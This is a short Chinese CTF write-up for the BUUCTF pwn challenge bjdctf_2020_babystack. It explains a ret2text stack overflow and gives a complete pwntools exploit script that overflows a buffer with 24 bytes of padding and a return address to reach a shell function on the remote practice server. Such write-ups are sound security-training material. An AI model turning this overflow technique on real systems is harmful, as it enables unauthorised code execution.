【BUUCTF】bjdctf_2020_babystack Write Up

继续刷buuoj中…
看到上新题了,是当时比赛的时候做过的一道题,顺手打掉
【BUUCTF】bjdctf_2020_babystack Write Up_第1张图片
【BUUCTF】bjdctf_2020_babystack Write Up_第2张图片
【BUUCTF】bjdctf_2020_babystack Write Up_第3张图片

程序只开了NX保护,读入字符数可控,直接ret2text解决

遇到的小问题是,本地环境打0x4006E6打不通,换成了0x4006EA,后来测试远程环境2个都可以,有点迷 =_=

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('node3.buuoj.cn',28201)
#io=process('./bjdctf_2020_babystack')
elf=ELF('./bjdctf_2020_babystack')

ra()
sl('32')
ra()
sl('a'*24+p64(0x4006e6))

io.interactive()

你可能感兴趣的:(BUUCTF,-,PWN)